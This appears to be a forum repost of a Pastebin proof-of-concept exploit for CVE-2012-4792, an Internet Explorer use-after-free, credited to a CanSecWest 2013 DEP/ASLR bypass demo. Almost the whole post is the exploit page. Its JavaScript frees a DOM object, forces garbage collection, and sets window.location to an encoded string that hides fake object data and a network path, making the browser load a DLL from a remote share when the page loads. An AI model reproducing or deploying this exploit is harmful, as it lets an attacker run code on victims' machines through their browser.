CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT"

Nytro · April 4, 2013

[h=1]CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT[/h]

    <!doctype html>
    <html>
    <head>
    <script>
    // CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT" in CanSecWest 2013
    // Effective in 32-bit IE on x64 Windows
    // Will load \\192.168.59.128\x\x.dll
    // https://twitter.com/tombkeeper
    function GIFT() {
            var e0 = null;
            var e1 = null;
            var e2 = null;

            try {
                    e0 = document.getElementById("a");
                    e1 = document.getElementById("b");
                    e2 = document.createElement("q");
                    e1.applyElement(e2);
                    e1.appendChild(document.createElement('button'));
                    e1.applyElement(e0);
                    e2.outerText = "";
                    e2.appendChild(document.createElement('body'));
            } catch(e) { }
            CollectGarbage();
        window.location = "\u0274\u7ffe\u4242\u4242\u0014\u0030\u0044" +
        "\u0012\u1212\u0004\u005c\u005c\u0031\u0039\u0032\u002e\u0031" +
        "\u0036\u0038\u002e\u0035\u0039\u002e\u0031\u0032\u0038\u005c" +
        "\u0078\u005c\u0078\u002e\u0064\u006c\u006c\u006e\u0074\u0064" +
        "\u006c\u006c\u002e\u0064\u006c\u006c";
    }

    </script>
    </head>
    <body onload="eval(GIFT())">
            <form id="a">
            </form>
            <dfn id="b">
            </dfn>
    </body>
    </html>

Sursa:

 CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT" - Pastebin.com

Sign In

CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT"

Recommended Posts

Nytro

Join the conversation

Browse

Activity

Pages